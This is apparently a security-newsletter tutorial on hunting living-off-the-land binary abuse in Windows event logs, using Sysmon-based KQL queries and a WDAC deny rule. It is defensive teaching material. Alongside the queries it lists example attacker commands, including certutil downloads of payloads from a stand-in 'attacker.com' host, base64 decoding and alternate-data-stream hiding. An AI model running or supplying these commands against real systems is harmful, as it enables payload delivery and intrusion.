How to Threat Hunt LOLBAS: Signed Binary Abuse in Windows Event Logs

Retool's new app builder is where AI-generated code ships safely
Building apps with AI is easy. Getting them to production safely is another story.
LOLBAS attacks are effective because they abuse trusted, signed Microsoft binaries that bypass application control policies and often do not trigger AV signatures. The LOLBAS project (lolbas-project.github.io) catalogs over 100 Windows binaries with documented attack techniques.
Threat hunting for LOLBAS focuses on two key signals: anomalous command line arguments (certutil making network calls, regsvr32 pointing to a URL) and anomalous parent processes (mshta launched by Office, powershell.exe launched by cmd.exe launched by svchost). Sysmon Event 1 (process creation with full command line) and Event 3 (network connection) provide the primary data.
LOLBAS 1: certutil Abuse Detection
certutil is a certificate management utility that can download files, decode base64, and encode content: legitimate uses are narrow, so network activity or file decoding is highly suspicious.
Known malicious certutil uses:
# Download a payload:
certutil.exe -urlcache -split -f http://attacker.com/payload.exe C:\Windows\Temp\p.exe
# Decode a base64-encoded payload:
certutil.exe -decode encoded.b64 payload.exe
# Download and decode in one step:
certutil -f -urlcache http://attacker.com/payload.b64 C:\Temp\p.b64
certutil -decode C:\Temp\p.b64 C:\Temp\payload.exe
# Alternate data stream abuse:
certutil -urlcache -split -f http://attacker.com/payload.exe C:\temp\test.txt:payload.exe
Hunting with Sysmon (Event 1 + Event 3):
// Sysmon Event 1: certutil with network-related arguments
Event
| where Source == "Microsoft-Windows-Sysmon"
| where EventID == 1 // Process creation
| where RenderedDescription has "certutil"
| where RenderedDescription has_any (
"-urlcache", "-URL", "http://", "https://", // Download
"-decode", "-encode", // Encoding operations
"-split" // Used with downloads
)
| project TimeGenerated, Computer,
CommandLine = extract(@'CommandLine: ([^\n]+)', 1, RenderedDescription),
ParentImage = extract(@'ParentImage: ([^\n]+)', 1, RenderedDescription)
// Sysmon Event 3: certutil making network connections (always suspicious)
Event
| where Source == "Microsoft-Windows-Sysmon" and EventID == 3
| where RenderedDescription has "certutil.exe"
| where not (RenderedDescription has_any ("10.0.0.", "192.168.")) // Internal CRL distribution points
| project TimeGenerated, Computer,
DestIP = extract(@'DestinationIp: ([^\n]+)', 1, RenderedDescription),
DestPort = extract(@'DestinationPort: ([^\n]+)', 1, RenderedDescription)
LOLBAS 2: regsvr32, mshta, and msiexec
regsvr32 Squiblydoo detection:
// regsvr32 executing a remote COM scriptlet (never legitimate)
Event
| where Source == "Microsoft-Windows-Sysmon" and EventID == 1
| where RenderedDescription has "regsvr32"
| where RenderedDescription has_any (
"scrobj.dll", // Squiblydoo requires scrobj.dll
"http://", // Remote URL
"https://",
"/u ", // Squiblydoo flags: /s /n /u /i
"/n "
)
// regsvr32 should only register local DLLs, never call remote URLs:
| project TimeGenerated, Computer,
CommandLine = extract(@'CommandLine: ([^\n]+)', 1, RenderedDescription),
ParentImage = extract(@'ParentImage: ([^\n]+)', 1, RenderedDescription)
mshta remote execution detection:
// mshta executing a remote URL or VBScript (highly suspicious)
Event
| where Source == "Microsoft-Windows-Sysmon" and EventID == 1
| where RenderedDescription has "mshta"
| where RenderedDescription has_any (
"http://", "https://", // Remote HTA file
"javascript:", // Inline JS execution
"vbscript:", // Inline VBS execution
"script:" // Script protocol
)
// Extra suspicion: mshta spawned by Office applications:
| where RenderedDescription has_any (
"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE",
"outlook.exe", "cmd.exe"
)
| project TimeGenerated, Computer,
CommandLine = extract(@'CommandLine: ([^\n]+)', 1, RenderedDescription),
ParentImage = extract(@'ParentImage: ([^\n]+)', 1, RenderedDescription)
msiexec remote package execution:
// msiexec downloading and executing a remote MSI (MITRE T1218.007)
Event
| where Source == "Microsoft-Windows-Sysmon" and EventID == 1
| where RenderedDescription has "msiexec"
| where RenderedDescription has_any (
"http://", "https://", // Remote MSI
"/q", // Quiet install (no UI: malware hides installation)
"ActiveX", // ActiveX-based COM payload
"/y" // Register DLL (like regsvr32)
)
| project TimeGenerated, Computer,
CommandLine = extract(@'CommandLine: ([^\n]+)', 1, RenderedDescription)
Briefings like this, every morning before 9am.
Threat intel, active CVEs, and campaign alerts, distilled for practitioners. 50,000+ subscribers. No noise.
LOLBAS 3: bitsadmin, wmic, and rundll32
bitsadmin download detection:
// bitsadmin used as a downloader (legitimate use is Windows Update, rare in user context)
Event
| where Source == "Microsoft-Windows-Sysmon" and EventID == 1
| where RenderedDescription has "bitsadmin"
| where RenderedDescription has_any (
"/transfer", // Create a transfer job (download)
"/addfile", // Add URL to download
"/complete", // Finalize the download
"/resume"
)
// Alert when run by a user process (not SYSTEM/NETWORK SERVICE):
| where not (RenderedDescription has_any ("SYSTEM", "NETWORK SERVICE"))
| project TimeGenerated, Computer,
CommandLine = extract(@'CommandLine: ([^\n]+)', 1, RenderedDescription),
User = extract(@'User: ([^\n]+)', 1, RenderedDescription)
wmic remote execution and process spawning:
// wmic used for lateral movement or process execution
Event
| where Source == "Microsoft-Windows-Sysmon" and EventID == 1
| where RenderedDescription has "wmic"
| where RenderedDescription has_any (
"process call create", // Execute a command on local or remote system
"/node:", // Remote WMI execution
"os get", // OS enumeration
"shadowcopy delete", // Ransomware VSS deletion
"product get" // Software enumeration (common in recon)
)
| project TimeGenerated, Computer,
CommandLine = extract(@'CommandLine: ([^\n]+)', 1, RenderedDescription)
// Alert on wmic shadowcopy delete (ransomware pre-encryption step):
Event
| where Source == "Microsoft-Windows-Sysmon" and EventID == 1
| where RenderedDescription has "wmic" and RenderedDescription has "shadowcopy"
| project TimeGenerated, Computer,
CommandLine = extract(@'CommandLine: ([^\n]+)', 1, RenderedDescription)
rundll32 execution of remote or suspicious payloads:
// rundll32 executing from temp directories or with suspicious DLLs
Event
| where Source == "Microsoft-Windows-Sysmon" and EventID == 1
| where RenderedDescription has "rundll32"
| where RenderedDescription has_any (
"C:\\Users\\AppData", // User-writeable path
"C:\\Temp",
"C:\\Windows\\Temp",
",Control_RunDLL", // UAC bypass patterns
"javascript:",
"http://"
)
| project TimeGenerated, Computer,
CommandLine = extract(@'CommandLine: ([^\n]+)', 1, RenderedDescription),
ParentImage = extract(@'ParentImage: ([^\n]+)', 1, RenderedDescription)
Compound Hunting: Parent-Child Anomalies
The most reliable LOLBAS detection signal is an anomalous parent-child process relationship: Office applications spawning cmd.exe or wscript.exe, or wscript.exe spawning mshta.exe.
// Detect Office applications spawning shells or LOLBAS (phishing macro execution)
Event
| where Source == "Microsoft-Windows-Sysmon" and EventID == 1
| extend ParentImage = extract(@'ParentImage: ([^\n]+)', 1, RenderedDescription)
| extend ChildImage = extract(@'Image: ([^\n]+)', 1, RenderedDescription)
// Parent is an Office application:
| where ParentImage has_any (
"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE",
"outlook.exe", "onenote.exe"
)
// Child is a suspicious binary:
| where ChildImage has_any (
"cmd.exe", "powershell.exe", "wscript.exe",
"cscript.exe", "mshta.exe", "certutil.exe",
"regsvr32.exe", "rundll32.exe"
)
| project TimeGenerated, Computer, ParentImage, ChildImage,
CommandLine = extract(@'CommandLine: ([^\n]+)', 1, RenderedDescription)
// Detect scheduled task creation via schtasks (persistence):
Event
| where Source == "Microsoft-Windows-Sysmon" and EventID == 1
| where RenderedDescription has "schtasks"
| where RenderedDescription has_any ("/create", "/change")
// Schtasks spawned by unusual parents:
| extend ParentImage = extract(@'ParentImage: ([^\n]+)', 1, RenderedDescription)
| where ParentImage !has_any ("taskhost", "Explorer", "SYSTEM")
| project TimeGenerated, Computer, ParentImage,
CommandLine = extract(@'CommandLine: ([^\n]+)', 1, RenderedDescription)
Block LOLBAS execution with WDAC (where possible):
<!-- Windows Defender Application Control: block known LOLBAS that are never legitimate
Add to your WDAC policy as Deny rules: -->
<FileRules>
<!-- Block certutil network downloads (hash of known version can also be targeted): -->
<Deny ID="ID_DENY_CERTUTIL" FriendlyName="Block certutil urlcache"
FileName="certutil.exe" />
<!-- Alternative: use script enforcement to inspect PowerShell scripts that call LOLBAS -->
<!-- WDAC script enforcement + CLM blocks PowerShell-driven LOLBAS calls -->
</FileRules>
<!-- Note: Blocking certutil entirely may break certificate operations.
Prefer detection + AMSI inspection over blocking where the binary is legitimately needed. -->
The bottom line
LOLBAS threat hunting uses Sysmon Event 1 (process creation) to detect anomalous command line arguments for signed binaries: certutil with -urlcache or -decode, regsvr32 with scrobj.dll and a URL, mshta with http:// or javascript: arguments, bitsadmin with /transfer in a user context. Compound the detection with parent-child anomalies: any Office application (WINWORD.EXE, EXCEL.EXE) spawning cmd.exe, wscript.exe, or mshta.exe is high-confidence malicious. Use the LOLBAS Project database (lolbas-project.github.io) to identify the full set of abusable binaries and their documented techniques for building a comprehensive hunting library.
Frequently asked questions
What are LOLBAS and why are they difficult to detect?
LOLBAS (Living Off the Land Binaries and Scripts) are legitimate, Microsoft-signed Windows executables that attackers abuse for malicious purposes: certutil downloads payloads, regsvr32 executes COM scriptlets from URLs, mshta runs remote JScript/VBScript. They are difficult to detect because they are trusted by application control solutions (signed by Microsoft), may not trigger AV signatures (they are legitimate binaries, not malware), and blend in with normal Windows operations. Detection requires focusing on anomalous usage context: the command line arguments, parent process, network activity, and destination path.
How do you detect certutil being used maliciously?
Monitor Sysmon Event 1 (process creation) for certutil.exe with arguments -urlcache, -split, -decode, or containing http:// or https:// strings: legitimate certutil use is narrow (certificate validation, CA operations) and never requires downloading from arbitrary internet URLs. Also monitor Sysmon Event 3 (network connection) for certutil.exe making outbound connections to external IPs: certutil should only connect to CRL distribution points on internal infrastructure. Either signal is high-confidence malicious.
How do you build a threat hunting hypothesis for LOLBin abuse?
Structure LOLBin hunting hypotheses in three parts: attacker goal (what are they trying to accomplish?), technique (which LOLBin achieves that goal?), and observable (what evidence does this leave?). Example: Goal: download second-stage payload. Technique: certutil.exe -urlcache -split -f http://attacker.com/payload.exe. Observable: certutil.exe process with outbound network connection and -urlcache in command line. For each LOLBin in your environment, list its legitimate use case and its offensive use case, then write detection logic that fires on the offensive use case while excluding the known legitimate pattern. Sigma rules from SigmaHQ (github.com/SigmaHQ/sigma) provide pre-built hunting logic for most LOLBin techniques.
What are the most commonly abused LOLBins that security teams should monitor?
Top 10 LOLBins by abuse frequency in threat intelligence reports: (1) PowerShell.exe — encoded command execution, AMSI bypass; (2) certutil.exe — download and Base64 decode; (3) regsvr32.exe — DLL and scriptlet execution (Squiblydoo); (4) mshta.exe — HTA script execution; (5) wscript.exe/cscript.exe — VBS/JScript execution; (6) bitsadmin.exe — file download; (7) rundll32.exe — arbitrary DLL execution; (8) cmd.exe — used as intermediary for LOLBin chaining; (9) msiexec.exe — remote MSI download and execution; (10) installutil.exe — bypass application allowlisting via .NET InstallUtil. Priority monitoring: instrument Sysmon for all 10 with network connection and parent process context.
How do I use Sigma rules to detect LOLBin abuse in my SIEM?
Sigma is an open-source detection format that can be converted to queries for any SIEM. To use Sigma rules for LOLBin detection: download the SigmaHQ repository, browse the rules/windows/process_creation/ directory for LOLBin-specific rules (e.g., proc_creation_win_certutil_download.yml), and convert using the sigma CLI: 'sigma convert -t splunk rules/windows/process_creation/proc_creation_win_certutil_download.yml'. Sigma rules contain both the detection logic and metadata (status, level, tags with MITRE ATT&CK technique IDs). The sigmahq.github.io website provides pre-converted queries for Splunk, QRadar, Elastic, and Microsoft Sentinel that can be pasted directly into your SIEM.
How do you reduce false positives when hunting for LOLBin abuse without missing real attacker activity?
LOLBin detection generates high false positive rates because these binaries have legitimate uses that vary across environments. Build exclusion lists from your own environment's baseline: collect 30 days of certutil, mshta, and regsvr32 process creation events with full command lines, then use frequency analysis ('aureport --exe --summary' for auditd, or KQL summarize by CommandLine) to identify recurring benign patterns. Encode environment-specific exclusions into your detection queries using 'not' conditions targeting specific parent processes, known command line prefixes, or originating machine names (IT management workstations legitimately use certutil more than user workstations). The strongest signal combination: network connection from a LOLBin (Sysmon Event 3) is far more suspicious than process creation alone; certutil with no outbound connection may be legitimate, but certutil making a connection to a non-internal IP is high-confidence malicious regardless of command line. Sigma rules at SigmaHQ include 'falsepositives' metadata fields documenting known benign sources -- review these before deploying to production to understand where your environment may diverge and require additional exclusion conditions.
Sources & references
Free resources
Critical CVE Reference Card 2025–2026
25 actively exploited vulnerabilities with CVSS scores, exploit status, and patch availability. Print it, pin it, share it with your SOC team.
Ransomware Incident Response Playbook
Step-by-step 24-hour IR checklist covering detection, containment, eradication, and recovery. Built for SOC teams, IR leads, and CISOs.
Get threat intel before your inbox does.
50,000+ security professionals read Decryption Digest for early warnings on zero-days, ransomware, and nation-state campaigns. Free, daily, no spam.
Unsubscribe anytime. We never sell your data.

Founder & Cybersecurity Evangelist, Decryption Digest
Cybersecurity professional with expertise in threat intelligence, vulnerability research, and enterprise security. Covers zero-days, ransomware, and nation-state operations for 50,000+ security professionals every morning.
Win a $2,495 Black Hat pass.
Full-access to Black Hat USA 2026 in Las Vegas. Subscribe free to enter.
